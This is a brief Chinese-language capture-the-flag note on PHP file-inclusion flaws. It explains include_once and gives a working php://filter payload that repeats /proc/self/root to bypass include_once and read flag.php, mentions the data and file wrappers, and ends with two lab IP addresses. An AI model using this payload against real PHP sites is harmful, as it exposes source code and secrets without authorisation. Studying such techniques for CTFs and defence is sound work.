文件包含 #
常见的有include,require,include_once,require_once
其中once表示已经包含的不会再包含
如果有include flah.php
在让我们包含include_once $file
可以用
/?file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
利用伪协议
data,file等
174.1.33.5 web1 172.2.215.9 web1